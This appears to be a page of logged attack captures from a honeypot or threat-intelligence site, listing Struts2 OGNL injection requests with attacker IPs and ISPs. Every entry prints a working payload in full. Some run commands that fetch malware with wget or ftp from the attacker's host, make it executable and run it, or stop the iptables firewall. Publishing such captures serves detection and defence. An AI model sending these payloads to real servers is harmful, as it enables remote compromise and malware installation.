This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 6249 results (625 pages)

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 118.244.237.33
Dest. port: 80
Time: 23/09/2017 09:28:48
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
POST /login.action HTTP/1.1 Content-Length: 561 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.12.3 Host: 86.140.9.42 Content-Type: application/x-www-form-urlencoded redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 118.244.237.33
Dest. port: 80
Time: 23/09/2017 09:28:47
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
POST /index.action HTTP/1.1 Content-Length: 561 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.12.3 Host: 86.140.9.42 Content-Type: application/x-www-form-urlencoded redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 153.99.229.220
Dest. port: 80
Time: 27/04/2017 20:33:48
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Jiangsu, Yangzhou
POST /login.action HTTP/1.1 Content-Length: 471 accept-language: zh_CN accept-encoding: gzip, deflate Host: 109.64.157.234:80 User-Agent: Auto Spider 1.0 connection: close Content-Type: application/x-www-form-urlencoded redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 221.194.44.221
Dest. port: 80
Time: 24/03/2017 09:09:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Shanghai, Shanghai
POST /login.action HTTP/1.1 Content-Length: 551 Accept: */* User-Agent: Mozilla/5.0 Host: 114.255.167.162 expect: 100-continue Content-Type: application/x-www-form-urlencoded redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22nohup%22%2C%22%2Froot%2Fpoiu%22%2C%22%3E%22%2C%22%2Fdev%2Fnull%22%2C%222%3E%261%22%2C%22%26%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[20000],%23d.read(%23e),%23res.getWriter().println(%23e),%23res.getWriter().flush(),%23res.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 221.194.44.221
Dest. port: 80
Time: 24/03/2017 09:09:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Shanghai, Shanghai
POST /login.action HTTP/1.1 Content-Length: 501 Accept: */* User-Agent: Mozilla/5.0 Host: 114.255.167.162 expect: 100-continue Content-Type: application/x-www-form-urlencoded redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22chmod%22%2C%220755%22%2C%22%2Froot%2Fpoiu%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[20000],%23d.read(%23e),%23res.getWriter().println(%23e),%23res.getWriter().flush(),%23res.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 221.194.44.221
Dest. port: 80
Time: 24/03/2017 09:09:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Shanghai, Shanghai
POST /login.action HTTP/1.1 Content-Length: 490 Accept: */* User-Agent: Mozilla/5.0 Host: 114.255.167.162 expect: 100-continue Content-Type: application/x-www-form-urlencoded redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22chmod%22%2C%22777%22%2C%22poiu%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[20000],%23d.read(%23e),%23res.getWriter().println(%23e),%23res.getWriter().flush(),%23res.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 221.194.44.221
Dest. port: 80
Time: 24/03/2017 09:09:19
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Shanghai, Shanghai
POST /login.action HTTP/1.1 Content-Length: 512 Accept: */* User-Agent: Mozilla/5.0 Host: 114.255.167.162 expect: 100-continue Content-Type: application/x-www-form-urlencoded redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22wget%22%2C%22http%3A%2F%2F221.194.44.221%3A77%2Fpoiu%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[20000],%23d.read(%23e),%23res.getWriter().println(%23e),%23res.getWriter().flush(),%23res.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 221.194.44.221
Dest. port: 80
Time: 24/03/2017 09:09:18
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Shanghai, Shanghai
POST /login.action HTTP/1.1 Content-Length: 497 Accept: */* User-Agent: Mozilla/5.0 Host: 114.255.167.162 expect: 100-continue Content-Type: application/x-www-form-urlencoded redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22service%22%2C%22iptables%22%2C%22stop%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[20000],%23d.read(%23e),%23res.getWriter().println(%23e),%23res.getWriter().flush(),%23res.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 221.194.44.221
Dest. port: 80
Time: 24/03/2017 09:09:17
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Shanghai, Shanghai
POST /login.action HTTP/1.1 Content-Length: 858 Accept: */* User-Agent: Mozilla/5.0 Host: 114.255.167.162 expect: 100-continue Content-Type: application/x-www-form-urlencoded redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22cmd%22%2C%22%2Fc%22%2C%22%40echo%22%2C%22open%22%2C%22221.194.44.221%3E%3Eqw0.dat%26%40echo%22%2C%22110%3E%3Eqw0.dat%26%40echo%22%2C%22110%3E%3Eqw0.dat%26%40echo%22%2C%22bin%3E%3Eqw0.dat%26%40echo%22%2C%22get%22%2C%22syun.exe%3E%3Eqw0.dat%26%40echo%22%2C%22bye%3E%3Eqw0.dat%26%40echo%22%2C%22syun.exe%3E%3Eqw0.dat%26%40ftp%22%2C%22-s%3Aqw0.dat%26del%22%2C%22qw0.dat%26syun.exe%26syun.exe%26syun.exe%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[20000],%23d.read(%23e),%23res.getWriter().println(%23e),%23res.getWriter().flush(),%23res.getWriter().close()}

Struts2 Prefixed Parameters OGNL Injection Vulnerability

[Attack info]
Attacker: 221.194.44.221
Dest. port: 80
Time: 24/03/2017 09:09:16
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CNCGROUP China169 Backbone
Location: Shanghai, Shanghai
POST /login.action HTTP/1.1 Content-Length: 395 connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 Host: 114.255.167.162 expect: 100-continue Content-Type: application/x-www-form-urlencoded redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}